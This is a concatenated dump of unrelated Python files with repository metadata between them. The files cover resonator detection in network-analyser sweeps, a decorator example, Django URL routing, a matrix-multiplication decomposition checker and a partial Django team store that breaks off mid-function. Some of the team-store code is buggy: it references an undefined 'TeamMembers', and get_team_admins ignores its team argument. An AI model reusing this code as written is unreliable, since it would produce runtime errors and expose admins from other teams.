xlim_size = xlim_right - xlim_left
ylim_size = ylim_right - ylim_left
self.ax.set_xlim(xlim_left - self.zoom_factor * xlim_size, xlim_right + self.zoom_factor * xlim_size)
self.ax.set_ylim(ylim_left - self.zoom_factor * ylim_size, ylim_right + self.zoom_factor * ylim_size)
plt.draw()
def on_key_release(self, event):
# windows or mac
if platform.system() == 'Darwin':
if event.key == 'a':
self.shift_is_held = False
if event.key == 'd':
self.control_is_held = False
else:
if event.key == 'shift':
self.shift_is_held = False
if event.key == 'control':
self.control_is_held = False
def onClick(self, event):
if event.button == 3:
if self.shift_is_held: # add point
print("adding point", event.xdata)
self.kid_idx = np.hstack((self.kid_idx, np.argmin(np.abs(self.chan_freqs - event.xdata))))
self.kid_idx = self.kid_idx[np.argsort(self.kid_idx)]
self.refresh_plot()
elif self.control_is_held: # delete point
print("removing point", event.xdata)
delete_index = np.argmin(np.abs(self.chan_freqs[self.kid_idx] - event.xdata))
self.kid_idx = np.delete(self.kid_idx, delete_index)
self.refresh_plot()
# self.delete_list.append(event.xdata)
# plt.plot(event.xdata,event.ydata,"x",markersize = 20,mew = 5)
else:
print("please hold either the shift or control key while right clicking to add or remove points")
def refresh_plot(self):
self.p1.set_data(self.chan_freqs[self.kid_idx], self.data[self.kid_idx])
for i in range(0, self.kid_idx_len):
self.text_dict[i].set_text("") # clear all of the texts
self.text_dict = {}
for i in range(0, len(self.kid_idx)):
self.text_dict[i] = plt.text(self.chan_freqs[self.kid_idx][i], self.data[self.kid_idx][i], str(i))
self.kid_idx_len = len(self.kid_idx)
plt.draw()
class InteractiveThresholdPlot(object):
def __init__(self, f_Hz, s21_mag, peak_threshold_dB, spacing_threshold_Hz=None,
window_pad_factor=1.2, fitter_pad_factor=5.0, debug_mode=False):
self.peak_threshold_dB = peak_threshold_dB
self.spacing_threshold_Hz = spacing_threshold_Hz
self.window_pad_factor = window_pad_factor
self.fitter_pad_factor = fitter_pad_factor
self.f_Hz = f_Hz
self.f_GHz = f_Hz * 1.0e-9
self.s21_mag = s21_mag
self.regions = None
self.ilo = None
self.local_minima = None
self.minima_as_windows = None
self.calc_regions()
if not debug_mode:
self.fig = plt.figure(2, figsize=(16, 6))
self.ax = self.fig.add_subplot(111)
self.fig.canvas.mpl_connect('key_press_event', self.on_key_press)
self.l1, = self.ax.plot(self.f_GHz, self.s21_mag)
self.p1, = self.ax.plot(self.f_GHz[self.ilo], self.s21_mag[self.ilo], "r*")
self.p2, = self.ax.plot(self.f_GHz[self.local_minima], self.s21_mag[self.local_minima], "b*")
print("Press up or down to change the threshold by 0.1 dB or press t to enter a custom threshold value.")
print("Close all plots when finished")
plt.xlabel('frequency (GHz)')
plt.ylabel('dB')
self.ax.set_title(F"Threshold: 3 adjacent points under {'%2.2f' % self.peak_threshold_dB} dB.")
plt.show(block=True)
def on_key_press(self, event):
# print event.key
# has to be shift and ctrl because remote viewers only forward
# certain key combinations
# print event.key == 'd'
if event.key == 'up':
self.peak_threshold_dB = self.peak_threshold_dB + 0.1
self.refresh_plot()
if event.key == 'down':
self.peak_threshold_dB = self.peak_threshold_dB - 0.1
self.refresh_plot()
if event.key == 't':
self.peak_threshold_dB = np.float(input("What threshold would you like in dB? "))
self.refresh_plot()
def refresh_plot(self):
self.calc_regions()
self.p1.set_data(self.f_GHz[self.ilo], self.s21_mag[self.ilo])
self.p2.set_data(self.f_GHz[self.local_minima], self.s21_mag[self.local_minima])
self.ax.set_title(F"Threshold: 3 adjacent points under {'%2.2f' % self.peak_threshold_dB} dB.")
plt.draw()
def calc_regions(self):
bool_threshhold = self.s21_mag < -1.0 * self.peak_threshold_dB
# self.ilo = np.where(self.s21_mag < -1.0 * self.peak_threshold_dB)[0]
self.ilo = []
self.regions = []
self.local_minima = []
is_in_theshhold_last = False
sub_region = []
for test_index, is_in_theshhold in list(enumerate(bool_threshhold)):
if is_in_theshhold:
self.ilo.append(test_index)
sub_region.append(test_index)
else:
if is_in_theshhold_last:
# when the last point was in, but not this point it is time to finish the old region
self.regions.append(sub_region)
sub_region = []
is_in_theshhold_last = is_in_theshhold
else:
if sub_region:
self.regions.append(sub_region)
window_calc_data = []
# calculate the local minima in a simple brute force method
for region in self.regions:
minima_this_region = []
minima_this_region_index = []
found_this_region = False
if len(region) > 2:
for region_index in range(len(region) - 2):
middle_region_index = region_index + 1
middle_data_index = region[middle_region_index]
left = self.s21_mag[region[region_index]]
middle = self.s21_mag[middle_data_index]
right = self.s21_mag[region[region_index + 2]]
if middle < left and middle <= right:
found_this_region = True
self.local_minima.append(middle_data_index)
minima_this_region.append(middle_data_index)
minima_this_region_index.append(middle_region_index)
if found_this_region:
window_calc_data.append((region, minima_this_region_index, minima_this_region))
# calculate the resonator windows
self.minima_as_windows = []
data_index_minima_left = None
single_window = None
right_window_not_found = False
data_index_bound = 0
for region, minima_this_region_index, minima_this_region in window_calc_data:
# deal with spacing conflicts in the same region
minima_this_region, minima_this_region_index = \
self.resolve_spacing_conflicts(minima_this_region=minima_this_region,
minima_this_region_index=minima_this_region_index)
data_index_region_bound_left = region[0]
data_index_region_bound_right = region[-1]
# combine minima in the same region with a spacing conflict
for region_index, data_index_minima in zip(minima_this_region_index, minima_this_region):
# halfway to the next resonator
if single_window is not None:
data_index_bound = int(np.round((data_index_minima_left + data_index_minima) / 2))
if right_window_not_found:
single_window["right_max"] = single_window["right_pad"] = \
single_window["right_fitter_pad"] = single_window["right_window"] = data_index_bound
else:
single_window["right_max"] = data_index_bound
test_right_pad = single_window["minima"] \
+ int(np.round((single_window["right_window"] - single_window["minima"]) \
* self.window_pad_factor))
if single_window["right_max"] < test_right_pad:
single_window["right_pad"] = single_window["right_max"]
else:
single_window["right_pad"] = test_right_pad
test_right_fitter_pad = single_window["minima"] \
+ int(np.round((single_window["right_window"] - single_window["minima"]) \
* self.fitter_pad_factor))
if single_window["right_max"] < test_right_fitter_pad:
single_window["right_fitter_pad"] = single_window["right_max"]
else:
single_window["right_fitter_pad"] = test_right_fitter_pad
self.minima_as_windows.append(SingleWindow(**single_window))
# the window where resonator is located
if region_index == minima_this_region_index[0]:
data_index_boundary_left = data_index_region_bound_left
else:
data_index_boundary_left = data_index_bound
if region_index == minima_this_region_index[-1]:
data_index_boundary_right = data_index_region_bound_right
right_window_not_found = False
else:
right_window_not_found = True
if right_window_not_found:
single_window = {"left_max": data_index_bound, "left_window": data_index_boundary_left,
"minima": data_index_minima}
else:
single_window = {"left_max": data_index_bound, "left_window": data_index_boundary_left,
"minima": data_index_minima, "right_window": data_index_boundary_right}
# window padding
test_left_pad = single_window["minima"] \
- int(np.round((single_window["minima"] - single_window["left_window"])
* self.window_pad_factor))
if test_left_pad < single_window["left_max"]:
single_window["left_pad"] = single_window["left_max"]
else:
single_window["left_pad"] = test_left_pad
test_left_fitter_pad = single_window["minima"] \
- int(np.round((single_window["minima"] - single_window["left_window"])
* self.fitter_pad_factor))
if test_left_fitter_pad < single_window["left_max"]:
single_window["left_fitter_pad"] = single_window["left_max"]
else:
single_window["left_fitter_pad"] = test_left_fitter_pad
data_index_minima_left = single_window["minima"]
else:
# finish the last step in the loop
data_index_bound = len(self.s21_mag)
if right_window_not_found:
single_window["right_max"] = single_window["right_window"] = data_index_bound
else:
single_window["right_max"] = data_index_bound
test_right_pad = single_window["minima"] + \
int(np.round((single_window["right_window"] - single_window["minima"])
* self.window_pad_factor))
if single_window["right_max"] < test_right_pad:
single_window["right_pad"] = single_window["right_max"]
else:
single_window["right_pad"] = test_right_pad
test_right_fitter_pad = single_window["minima"] \
+ int(np.round((single_window["right_window"] - single_window["minima"])
* self.fitter_pad_factor))
if single_window["right_max"] < test_right_fitter_pad:
single_window["right_fitter_pad"] = single_window["right_max"]
else:
single_window["right_fitter_pad"] = test_right_fitter_pad
self.minima_as_windows.append(SingleWindow(**single_window))
self.local_minima = [single_window.minima for single_window in self.minima_as_windows]
# spacing conflicts across all regions
self.local_minima, self.minima_as_windows = \
self.resolve_spacing_conflicts(minima_this_region=self.local_minima,
minima_this_region_index=self.minima_as_windows)
def resolve_spacing_conflicts(self, minima_this_region, minima_this_region_index):
found_spacing_conflict = True
while found_spacing_conflict:
found_spacing_conflict = False
number_of_minima_this_region = len(minima_this_region)
if number_of_minima_this_region > 1:
for counter in range(number_of_minima_this_region - 1):
data_index_minima_left_test = minima_this_region[counter]
data_index_minima_right_test = minima_this_region[counter + 1]
minima_spacing_Hz = abs(
self.f_Hz[data_index_minima_left_test] - self.f_Hz[data_index_minima_right_test])
if minima_spacing_Hz < self.spacing_threshold_Hz:
# minima are too close:
print(F"Spacing Conflict in same threshold region.")
print(F" Allowed spacing (MHz): {'%3.3f' % (self.spacing_threshold_Hz * 1.0e-6)}")
print(F" Minima spacing (MHz): {'%3.3f' % (minima_spacing_Hz * 1.0e-6)}")
# keep the lowest of the minima
value_left_minima = self.s21_mag[data_index_minima_left_test]
value_right_minima = self.s21_mag[data_index_minima_right_test]
if value_left_minima < value_right_minima:
index_location_to_remove = counter + 1
index_location_to_keep = counter
else:
index_location_to_remove = counter
index_location_to_keep = counter + 1
# data for the print statement
data_index_kept = minima_this_region[index_location_to_keep]
data_index_removed = minima_this_region[index_location_to_remove]
value_kept_minima = self.s21_mag[data_index_kept]
f_MHz_kept_minima = self.f_GHz[data_index_kept] * 1.0e3
value_removed_minima = self.s21_mag[data_index_removed]
f_MHz_removed_minima = self.f_GHz[data_index_removed] * 1.0e3
# where the data is removed
minima_this_region_index.pop(index_location_to_remove)
minima_this_region.pop(index_location_to_remove)
# make the users see what decisions the code is making
print(F"Minima Kept: {value_kept_minima} dbM at {'%3.3f' % f_MHz_kept_minima} MHz")
print(F"Minima Removed: {value_removed_minima} dbM at {'%3.3f' % f_MHz_removed_minima} MHz\n")
# stop the loop here and restart from scratch with one less minima
found_spacing_conflict = True
break
return minima_this_region, minima_this_region_index
def compute_dI_and_dQ(I, Q, freq=None, filterstr='SG', do_deriv=True):
"""
Given I,Q,freq arrays
input filterstr = 'SG' for sav-gol filter with builtin gradient, 'SGgrad' savgol then apply gradient to filtered
do_deriv: if want to look at filtered non differentiated data.
"""
if freq is None:
df = 1.0
else:
df = freq[1] - freq[0]
dI = filtered_differential(I, df, filtertype=filterstr, do_deriv=do_deriv)
dQ = filtered_differential(Q, df, filtertype=filterstr, do_deriv=do_deriv)
return dI, dQ
def filtered_differential(data, df, filtertype=None, do_deriv=True):
"""
take 1d array data with spacing df. return filtered version of data depending on filterrype
"""
window = 13
n = 3
if filtertype is None:
out = np.gradient(data, df)
elif filtertype.lower() == 'sg':
if do_deriv == True:
out = signal.savgol_filter(data, window, n, deriv=1, delta=df)
else:
out = signal.savgol_filter(data, window, n, deriv=0, delta=df)
elif filtertype.lower() == 'sggrad':
tobegrad = signal.savgol_filter(data, window, n)
out = np.gradient(tobegrad, df)
else:
raise KeyError(F"filtertype: {filtertype} is not recognized.")
return out
def filter_trace(path, bb_freqs, sweep_freqs):
chan_I, chan_Q = open_stored_sweep(path)
channels = np.arange(np.shape(chan_I)[1])
mag = np.zeros((len(bb_freqs), len(sweep_freqs)))
chan_freqs = np.zeros((len(bb_freqs), len(sweep_freqs)))
for chan in channels:
mag[chan] = (np.sqrt(chan_I[:, chan] ** 2 + chan_Q[:, chan] ** 2))
chan_freqs[chan] = (sweep_freqs + bb_freqs[chan]) / 1.0e6
# mag = np.concatenate((mag[len(mag)/2:], mag[0:len(mag)/2]))
mags = 20 * np.log10(mag / np.max(mag))
mags = np.hstack(mags)
# chan_freqs = np.concatenate((chan_freqs[len(chan_freqs)/2:],chan_freqs[0:len(chan_freqs)/2]))
chan_freqs = np.hstack(chan_freqs)
return chan_freqs, mags
def lowpass_cosine(y, tau, f_3db, width, padd_data=True):
# padd_data = True means we are going to symmetric copies of the data to the start and stop
# to reduce/eliminate the discontinuities at the start and stop of a dataset due to filtering
#
# False means we're going to have transients at the start and stop of the data
# kill the last data point if y has an odd length
if np.mod(len(y), 2):
y = y[0:-1]
# add the weird padd
# so, make a backwards copy of the data, then the data, then another backwards copy of the data
if padd_data:
y = np.append(np.append(np.flipud(y), y), np.flipud(y))
# take the FFT
ffty = fftpack.fft(y)
ffty = fftpack.fftshift(ffty)
# make the companion frequency array
delta = 1.0 / (len(y) * tau)
nyquist = 1.0 / (2.0 * tau)
freq = np.arange(-nyquist, nyquist, delta)
# turn this into a positive frequency array
print((len(ffty) // 2))
pos_freq = freq[(len(ffty) // 2):]
# make the transfer function for the first half of the data
i_f_3db = min(np.where(pos_freq >= f_3db)[0])
f_min = f_3db - (width / 2.0)
i_f_min = min(np.where(pos_freq >= f_min)[0])
f_max = f_3db + (width / 2.0)
i_f_max = min(np.where(pos_freq >= f_max)[0])
transfer_function = np.zeros(len(y) // 2)
transfer_function[0:i_f_min] = 1
transfer_function[i_f_min:i_f_max] = (1 + np.sin(-np.pi * ((freq[i_f_min:i_f_max] - freq[i_f_3db]) / width))) / 2.0
transfer_function[i_f_max:(len(freq) // 2)] = 0
# symmetrize this to be [0 0 0 ... .8 .9 1 1 1 1 1 1 1 1 .9 .8 ... 0 0 0] to match the FFT
transfer_function = np.append(np.flipud(transfer_function), transfer_function)
# apply the filter, undo the fft shift, and invert the fft
filtered = np.real(fftpack.ifft(fftpack.ifftshift(ffty * transfer_function)))
# remove the padd, if we applied it
if padd_data:
filtered = filtered[(len(y) // 3):(2 * (len(y) // 3))]
# return the filtered data
return filtered
def find_vna_sweep(f_Hz, z, smoothing_scale_Hz=5.0e6, spacing_threshold_Hz=1.0e5):
"""
f is frequencies (Hz)
z is complex S21
Smoothing scale (Hz)
spacing threshold (Hz)
"""
# first plot data and filter function before removing filter function
s21_mags = 20 * np.log10(np.abs(z))
filtermags = lowpass_cosine(y=s21_mags,
tau=f_Hz[1] - f_Hz[0],
f_3db=1. / smoothing_scale_Hz,
width=0.1 * (1.0 / smoothing_scale_Hz),
padd_data=True)
# the cosine filter drops the last point is the array has an pdd number of points
len_filtered = len(filtermags)
s21_mags = s21_mags[:len_filtered]
f_Hz = f_Hz[:len_filtered]
f_GHz = f_Hz * 1.0e-9
# calculations for peak spacing (rejection based on threshold)
highpass_mags = s21_mags - filtermags
# results plot for filter
plt.figure(2)
plt.plot(f_GHz, s21_mags, 'b', label='#nofilter')
plt.plot(f_GHz, filtermags, 'g', label='Filtered')
plt.xlabel('frequency (GHz)')
plt.ylabel('dB')
plt.legend()
plt.show()
# identify peaks using the interactive threshold plot
ipt = InteractiveThresholdPlot(f_Hz=f_Hz,
s21_mag=highpass_mags,
peak_threshold_dB=1.5,
spacing_threshold_Hz=spacing_threshold_Hz)
# Zero everything but the resonators
highpass_mags[highpass_mags > -1.0 * ipt.peak_threshold_dB] = 0
# the spacing thresholding was move to be inside the interactive threshold class
kid_idx = ipt.local_minima
ip = InteractivePlot(f_Hz, highpass_mags, kid_idx)
return ip
def slice_vna(f, z, kid_index, q_slice=2000):
# make f in Hz for fitting
# Q = f/(delta f) for fitting is determined by the lowest frequencies assumed to be at index 0
# delta f = f/Q
df = f[1] - f[0]
n_iq_points = int(f[0] / q_slice // df)
print(n_iq_points)
res_freq_array = np.zeros((len(kid_index), n_iq_points))
res_array = np.zeros((len(kid_index), n_iq_points)).astype('complex')
print(res_array.dtype)
for i in range(0, len(kid_index)):
a = kid_index[i] - n_iq_points // 2 - 1
b = kid_index[i] + n_iq_points // 2
res_freq_array[i, :] = f[a:b]
res_array[i, :] = z[a:b]
# if i == 4:
# plt.plot(res_freq_array[i,:],20*np.log10(np.abs(res_array[i,:])))
if i < len(kid_index) - 1: # dont check last res
# print(i)
if kid_index[i + 1] - kid_index[i] < n_iq_points: # collision at higher frequency
high_cutoff = int((kid_index[i + 1] + kid_index[i]) / 2)
# print(i,a,high_cutoff,b)
res_freq_array[i, high_cutoff - a:] = np.nan
res_array[i, high_cutoff - a:] = np.nan * (1 + 1j)
if i != 0: # dont check first res
# print(i)
if kid_index[i] - kid_index[i - 1] < n_iq_points:
low_cutoff = int((kid_index[i] + kid_index[i - 1]) / 2)
# print(i,a,low_cutoff,b)
res_freq_array[i, :low_cutoff - a] = np.nan
res_array[i, :low_cutoff - a] = np.nan * (1 + 1j)
# if i == 4:
# plt.plot(res_freq_array[i,:],20*np.log10(np.abs(res_array[i,:])),'--')
# plt.show()
return res_freq_array, res_array
def fit_slices(res_freq_array, res_array, do_plots=True, plot_filename='fits'):
pdf_pages = PdfPages(plot_filename + ".pdf")
fits_dict_mag = {}
fits_dict_iq = {}
for i in range(0, res_freq_array.shape[0]):
if do_plots:
fig = plt.figure(i, figsize=(12, 6))
try:
fit = rf.fit_nonlinear_iq(res_freq_array[i, :][~np.isnan(res_freq_array[i, :])],
res_array[i, :][~np.isnan(res_array[i, :])])
fits_dict_iq[i] = fit
if do_plots:
plt.subplot(121)
plt.plot(np.real(res_array[i, :]), np.imag(res_array[i, :]), 'o', label='data')
plt.plot(np.real(fit['fit_result']), np.imag(fit['fit_result']), label='fit')
plt.plot(np.real(fit['x0_result']), np.imag(fit['x0_result']), label='guess')
plt.legend()
except:
print("could not fit")
fits_dict_iq[i] = 'bad fit'
try:
fit2 = rf.fit_nonlinear_mag(res_freq_array[i, :][~np.isnan(res_freq_array[i, :])],
res_array[i, :][~np.isnan(res_array[i, :])])
fits_dict_mag[i] = fit2
if do_plots:
plt.subplot(122)
plt.plot(res_freq_array[i, :], 20 * np.log10(np.abs(res_array[i, :])), label='data')
plt.plot(res_freq_array[i, :][~np.isnan(res_freq_array[i, :])],
10 * np.log10(np.abs(fit2['fit_result'])), label='fit')
plt.plot(res_freq_array[i, :][~np.isnan(res_freq_array[i, :])],
10 * np.log10(np.abs(fit2['x0_result'])), label='guess')
plt.legend()
except:
print("could not fit")
fits_dict_mag[i] = 'bad fit'
pdf_pages.savefig(fig)
plt.close()
pdf_pages.close()
return fits_dict_iq, fits_dict_mag
def retune_vna(f, z, kid_index, n_points_look_around=0, look_low_high=[0, 0], f_old=None, z_old=None,
kid_index_old=None):
"""
This is a program for when the resonances move and you need to retune the indexes of the resonators
use n_point_look_around = 10 to look to lower and higher frequencies within 10 data points to find a new min
use look_left_right = [10,20] to look for a new min 10 points to the lower frequencies and 20 points to higher frequencies
if you would like to have the old data and kid indexes displayed in the background suppy
f_old, z_old, kid_index old
"""
if n_points_look_around > 0:
for i in range(0, len(kid_index)):
new_index = np.argmin(
20 * np.log10(np.abs(z[kid_index[i] - n_points_look_around:kid_index[i] + n_points_look_around]))) + \
kid_index[i] - n_points_look_around
kid_index[i] = new_index
ip = InteractivePlot(f, 20 * np.log10(np.abs(z)), kid_index, f_old=f_old, data_old=20 * np.log10(np.abs(z_old)),
kid_idx_old=kid_index_old)
return ip
| 47.838527
| 126
| 0.590454
|
7444ae4b35cbffa2905470be0a0e2d249b489126
| 743
|
py
|
Python
|
decorator_patterns/function_decorator_with_arguments.py
|
jbrt/python-decorator-patterns
|
f12cf820bcc4c6be9c810dfd222ca0845131debf
|
[
"MIT"
] | null | null | null |
decorator_patterns/function_decorator_with_arguments.py
|
jbrt/python-decorator-patterns
|
f12cf820bcc4c6be9c810dfd222ca0845131debf
|
[
"MIT"
] | null | null | null |
decorator_patterns/function_decorator_with_arguments.py
|
jbrt/python-decorator-patterns
|
f12cf820bcc4c6be9c810dfd222ca0845131debf
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
def decorator_with_argument(arg1, arg2):
"""
Function decorator with arguments
:param arg1: (int) first argument
:param arg2: (int) second argument
:return: function decorated
"""
def inner_function(func_to_decorate):
def wrapper(*args, **kwargs):
print(f"Enter decorator with arguments: {arg1} & {arg2}")
# Something before
response = func_to_decorate(*args, **kwargs)
# Something after
return response
return wrapper
return inner_function
@decorator_with_argument("arg1", "arg2")
def print_arguments(*args):
for arg in args:
print(arg)
if __name__ == '__main__':
print_arguments(1, 2, 3)
| 24.766667
| 69
| 0.628533
|
f6dcfa4366444b4b8367dc0a1ee266fd35f33a25
| 3,350
|
py
|
Python
|
xtra/sample/app/urls.py
|
HyechurnJang/archon
|
2cda56436ed6dea65d38774f7c9ed6c3315dbc03
|
[
"Apache-2.0"
] | 1
|
2018-03-07T08:33:23.000Z
|
2018-03-07T08:33:23.000Z
|
xtra/sample/app/urls.py
|
HyechurnJang/archon
|
2cda56436ed6dea65d38774f7c9ed6c3315dbc03
|
[
"Apache-2.0"
] | 2
|
2017-03-14T01:02:55.000Z
|
2017-03-14T01:07:29.000Z
|
xtra/sample/app/urls.py
|
HyechurnJang/archon
|
2cda56436ed6dea65d38774f7c9ed6c3315dbc03
|
[
"Apache-2.0"
] | 4
|
2017-02-03T04:53:07.000Z
|
2020-04-20T07:52:47.000Z
|
# -*- coding: utf-8 -*-
################################################################################
# _____ _ _____ _ #
# / ____(_) / ____| | | #
# | | _ ___ ___ ___ | (___ _ _ ___| |_ ___ _ __ ___ ___ #
# | | | / __|/ __/ _ \ \___ \| | | / __| __/ _ \ '_ ` _ \/ __| #
# | |____| \__ \ (_| (_) | ____) | |_| \__ \ || __/ | | | | \__ \ #
# \_____|_|___/\___\___/ |_____/ \__, |___/\__\___|_| |_| |_|___/ #
# __/ | #
# |___/ #
# _ __ _____ _ _____ ______ #
# | |/ / / ____| | |/ ____| ____| #
# | ' / ___ _ __ ___ __ _ | (___ ___ | | (___ | |__ #
# | < / _ \| '__/ _ \/ _` | \___ \ / _ \| |\___ \| __| #
# | . \ (_) | | | __/ (_| | ____) | (_) | |____) | |____ #
# |_|\_\___/|_| \___|\__,_| |_____/ \___/|_|_____/|______| #
# #
################################################################################
# #
# Copyright (c) 2016 Cisco Systems #
# All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain #
# a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT #
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the #
# License for the specific language governing permissions and limitations #
# under the License. #
# #
################################################################################
from django.conf.urls import url, include
from . import views
#===============================================================================
# Link your view here.
#===============================================================================
url_dropdown = [
url(r'sample1/?', views.sample1, name=u'샘플1'),
url(r'sample2/?', views.sample2, name=u'샘플2'),
]
urlpatterns = [
url(r'dropdown/', include(url_dropdown, namespace=u'드롭다운리스트')),
url(r'direct_sample/?', views.direct_sample, name=u'즉시로딩'),
]
| 64.423077
| 81
| 0.28597
|
828ca23a5b6e76bf683fdb5bf99aee451b120a82
| 3,206
|
py
|
Python
|
codegen/verify.py
|
RobinZhang14ZLP/fast-matmul
|
8bc5d3a7a5da86e191a5ddb39e88b4a2ce60315b
|
[
"BSD-2-Clause"
] | null | null | null |
codegen/verify.py
|
RobinZhang14ZLP/fast-matmul
|
8bc5d3a7a5da86e191a5ddb39e88b4a2ce60315b
|
[
"BSD-2-Clause"
] | null | null | null |
codegen/verify.py
|
RobinZhang14ZLP/fast-matmul
|
8bc5d3a7a5da86e191a5ddb39e88b4a2ce60315b
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2014-2015, Sandia Corporation
# All rights reserved.
#
# This file is part of fast-matmul and is under the BSD 2-Clause License,
# which can be found in the LICENSE file in the root directory, or at
# http://opensource.org/licenses/BSD-2-Clause.
import sys
# the sizes; we check mxnxk matmul with q products, assuming row-major ordering.
m = int(sys.argv[1])
n = int(sys.argv[2])
k = int(sys.argv[3])
q = int(sys.argv[4])
# read in U,V,W
U = []
V = []
W = []
#for i in range(m*n):
# U.append([])
# V.append([])
# W.append([])
for j in range(m*n):
line = sys.stdin.readline().split()
U.append([])
while line[0] == "#":
line = sys.stdin.readline().split()
if len(line) != q:
print( "Trouble at line",j,"of U, should have",q,"entries, has",len(line) )
for i in range(q):
U[j].append(float(line[i]))
for j in range(n*k):
line = sys.stdin.readline().split()
V.append([])
while line[0] == "#":
line = sys.stdin.readline().split()
if len(line) != q:
print( "Trouble at line",j,"of V, should have",q,"entries, has",len(line) )
for i in range(q):
V[j].append(float(line[i]))
for j in range(m*k):
line = sys.stdin.readline().split()
W.append([])
while line[0] == "#":
line = sys.stdin.readline().split()
if len(line) != q:
print( "Trouble at line", j, "of W, should have", q, "entries, has", len(line) )
for i in range(q):
W[j].append(float(line[i]))
print( "U" )
for r in U:
print (r)
print( "V" )
for r in V:
print (r)
print( "W" )
for r in W:
print (r)
#print "Ut"
#Ut = []
#for j in range(len(U[0])):
# Ut.append([])
# for i in range(len(U)):
# Ut[j].append(U[i][j])
#for r in Ut:
# print r
#print "Vt"
#Vt = []
#for j in range(len(V[0])):
# Vt.append([])
# for i in range(len(V)):
# Vt[j].append(V[i][j])
#for r in Vt:
# print r
#print "Wt"
#Wt = []
#for j in range(len(W[0])):
# Wt.append([])
# for i in range(len(W)):
# Wt[j].append(W[i][j])
#for r in Wt:
# print r
for a in range(m):
for b in range(n):
# a and b describe row of U
rU = a*n+b
for c in range(n):
for d in range(k):
rV = c*k+d
for e in range(m):
for f in range(k):
rW = e*k+f
# compute the contribution
sum = 0
for i in range(q):
sum += U[rU][i]*V[rV][i]*W[rW][i]
if a == e and b == c and d == f:
# should be a 1
if sum != 1:
print( "Trouble at", a, b, c, d, e, f, "sum should be 1, is ", sum)
print( "\tcheck row",rU,"of U, row",rV,"of V, and row",rW,"of W")
else:
if sum != 0:
print( "Trouble at", a, b, c, d, e, f, "sum should be 0, is ", sum)
print( "\tcheck row",a*n+b,"of U, row",c*k+d,"of V, and row",e*k+f,"of W")
| 27.401709
| 106
| 0.468808
|
42237db1314ef0fd26230ec1fc841a24b6124a52
| 9,315
|
py
|
Python
|
src/api/store/team.py
|
gregory-chekler/api
|
11ecbea945e7eb6fa677a0c0bb32bda51ba15f28
|
[
"MIT"
] | null | null | null |
src/api/store/team.py
|
gregory-chekler/api
|
11ecbea945e7eb6fa677a0c0bb32bda51ba15f28
|
[
"MIT"
] | null | null | null |
src/api/store/team.py
|
gregory-chekler/api
|
11ecbea945e7eb6fa677a0c0bb32bda51ba15f28
|
[
"MIT"
] | null | null | null |
from database.models import Team, UserProfile, Media, Community, TeamMember
from _main_.utils.massenergize_errors import MassEnergizeAPIError, InvalidResourceError, ServerError, CustomMassenergizeError, NotAuthorizedError
from _main_.utils.massenergize_response import MassenergizeResponse
from django.utils.text import slugify
from _main_.utils.context import Context
from .utils import get_community_or_die, get_user_or_die
class TeamStore:
def __init__(self):
self.name = "Team Store/DB"
def get_team_info(self, team_id) -> (dict, MassEnergizeAPIError):
team = Team.objects.get(id=team_id)
if not team:
return None, InvalidResourceError()
return team, None
def get_team_admins(self, context, team_id):
if not team_id:
return []
return [a.user for a in TeamMember.objects.filter(is_admin=True, is_deleted=False) if a.user is not None]
def list_teams(self, context: Context, args) -> (list, MassEnergizeAPIError):
try:
community = get_community_or_die(context, args)
user = get_user_or_die(context, args)
if community:
teams = Team.objects.filter(community=community)
elif user:
teams = user.team_set.all()
return teams, None
except Exception as e:
return None, CustomMassenergizeError(e)
def team_stats(self, context: Context, args) -> (list, MassEnergizeAPIError):
try:
community = get_community_or_die(context, args)
teams = Team.objects.filter(community=community)
ans = []
for team in teams:
res = {"members": 0, "households": 0, "actions": 0, "actions_completed": 0, "actions_todo": 0}
res["team"] = team.simple_json()
# team.members deprecated
# for m in team.members.all():
members = TeamMember.objects.filter(team=team)
res["members"] = members.count()
for m in members:
user = m.user
res["households"] += user.real_estate_units.count()
actions = user.useractionrel_set.all()
res["actions"] += len(actions)
res["actions_completed"] += actions.filter(**{"status":"DONE"}).count()
res["actions_todo"] += actions.filter(**{"status":"TODO"}).count()
ans.append(res)
return ans, None
except Exception as e:
return None, CustomMassenergizeError(e)
def create_team(self, user_id, args) -> (dict, MassEnergizeAPIError):
team = None
try:
community_id = args.pop('community_id', None)
image = args.pop('image', None)
admin_emails = args.pop('admin_emails', "").split(",")
if community_id:
community = Community.objects.filter(pk=community_id).first()
if not community:
return None, CustomMassenergizeError("Please provide a valid community")
else:
return None, CustomMassenergizeError("Please provide a community")
args["community"] = community
new_team = Team.objects.create(**args)
team = new_team
if image:
logo = Media.objects.create(file=image, name=f"{slugify(new_team.name)}-TeamLogo")
logo.save()
new_team.logo = logo
new_team.save()
for admin_email in admin_emails:
user = UserProfile.objects.filter(email=admin_email).first()
if user:
teamMember, ok = TeamMember.objects.get_or_create(team=team,user=user)
teamMember.is_admin = True
teamMember.save()
if user_id:
# team.members deprecated
teamMember = TeamMember.objects.create(team=team,user=user_id, is_admin=True)
#new_team.members.add(user_id)
#new_team.admins.add(user_id)
teamMember.save()
#new_team.save()
return new_team, None
except Exception as e:
print(e)
if team:
team.delete()
return None, CustomMassenergizeError(str(e))
def update_team(self, team_id, args) -> (dict, MassEnergizeAPIError):
try:
community_id = args.pop('community_id', None)
logo = args.pop('logo', None)
team = Team.objects.filter(id=team_id)
team.update(**args)
team = team.first()
if team:
if community_id:
community = Community.objects.filter(pk=community_id).first()
if community:
team.community = community
if logo:
logo = Media.objects.create(file=logo, name=f"{slugify(team.name)}-TeamLogo")
logo.save()
team.logo = logo
team.save()
return team, None
except Exception as e:
return None, CustomMassenergizeError(e)
def delete_team(self, team_id) -> (dict, MassEnergizeAPIError):
try:
print(team_id)
teams = Team.objects.filter(id=team_id)
if not teams:
return None, InvalidResourceError()
# team.members deprecated. Delete TeamMembers separate step
team = teams.first()
members = TeamMembers.objects.filter(team=team)
msg = "delete_team: Team %s deleting %d members" % (team.name,members.count())
print(msg)
members.delete()
teams.delete() # or should that be team.delete()?
return teams.first(), None
except Exception as e:
print(e)
return None, CustomMassenergizeError(e)
def join_team(self, team_id, user_id) -> (Team, MassEnergizeAPIError):
try:
team = Team.objects.get(id=team_id)
